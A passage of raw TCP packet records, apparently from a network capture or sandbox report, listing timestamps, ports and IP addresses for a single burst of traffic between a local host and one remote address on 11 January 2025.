Jan 11, 2025 20:26:08.176928997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.176943064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.176958084 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.176973104 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.176986933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177001953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177016973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177031040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177046061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177078009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177095890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177105904 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.177109957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177124023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177134037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.177139044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177145958 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.177155018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177167892 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.177170038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177185059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177200079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177205086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.177216053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177229881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177243948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177248001 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.177258015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177267075 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.177273035 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177287102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177288055 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.177324057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.177967072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177983046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.177997112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.178011894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.178025961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.178040028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.178054094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.178067923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.178082943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.178097010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.178111076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.178272963 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.264453888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.264486074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.264555931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.264559984 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.264607906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.264638901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.264672041 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.264679909 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.264699936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.264722109 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.264749050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.264781952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.264811039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.264823914 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.264851093 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.264859915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.264931917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.264962912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265005112 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.265018940 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265057087 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.265070915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265101910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265135050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265161037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265173912 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.265192032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265197039 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.265247107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265278101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265310049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265319109 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.265341997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265350103 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.265391111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265419006 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265428066 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.265450954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265482903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265510082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265520096 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.265542030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265547991 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.265574932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265607119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265645981 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.265655994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265687943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265695095 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.265721083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265753031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265784025 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265790939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.265816927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265820026 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.265849113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265881062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265912056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265918970 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.265944958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.265948057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.265979052 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266026974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266058922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266066074 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.266089916 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266094923 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.266122103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266170025 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266201973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266206026 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.266232967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266238928 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.266266108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266297102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266330957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266335964 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.266362906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266370058 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.266396046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266427040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266459942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266463995 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.266490936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266498089 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.266522884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266556025 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266587019 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266593933 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.266618013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266621113 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.266650915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266683102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266716003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266721964 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.266747952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266756058 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.266779900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266812086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266844988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266850948 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.266877890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.266880989 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.267016888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267056942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267088890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267098904 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.267121077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267122030 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.267153025 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267184973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267215967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267220974 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.267249107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267252922 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.267280102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267385960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267419100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267430067 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.267450094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267455101 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.267482996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267515898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267546892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267551899 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.267580032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267587900 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.267611980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267643929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267682076 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.267693043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267728090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267731905 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.267760992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267791986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267823935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267828941 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.267855883 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267860889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.267889023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267923117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.267965078 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.268060923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268094063 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268100977 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.268125057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268157005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268188000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268193007 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.268219948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268224001 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.268251896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268284082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268316031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268321037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.268347025 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268354893 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.268379927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268410921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268443108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268448114 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.268476963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268479109 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.268538952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268570900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268603086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268609047 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.268634081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268640041 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.268666029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268698931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268731117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268735886 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.268762112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.268765926 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.268795013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.271900892 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.355230093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355273962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355297089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355321884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355324984 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.355338097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355355024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355362892 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.355385065 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.355401993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355416059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355431080 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355464935 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.355576992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355592966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355607033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355613947 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.355621099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355635881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355643034 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.355643988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355668068 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.355712891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355729103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355746984 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.355776072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355789900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355803967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355817080 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355823040 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.355832100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.355843067 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.355865955 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.356055021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356069088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356081963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356096029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356111050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356111050 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.356123924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356131077 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.356148958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356164932 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.356344938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356358051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356373072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356386900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356393099 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.356401920 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356411934 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.356415987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356431007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356432915 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.356443882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356460094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356468916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.356678009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356692076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356705904 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356712103 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.356719971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356730938 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.356734991 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356749058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356750965 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.356762886 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356776953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356786013 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.356791019 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356807947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.356823921 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.356864929 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.357069969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357084990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357099056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357111931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357126951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357132912 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.357140064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357150078 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.357155085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357172012 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.357337952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357352972 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357367039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357373953 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.357381105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357395887 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357409954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357413054 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.357423067 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357433081 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.357453108 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.357623100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357636929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357657909 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357671022 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.357671022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357686043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357700109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357707024 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.357713938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357728004 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357733011 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.357742071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357754946 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357769012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357773066 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.357783079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357793093 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.357796907 CET	1129	49730	45.200.148.158	192.168.2.4
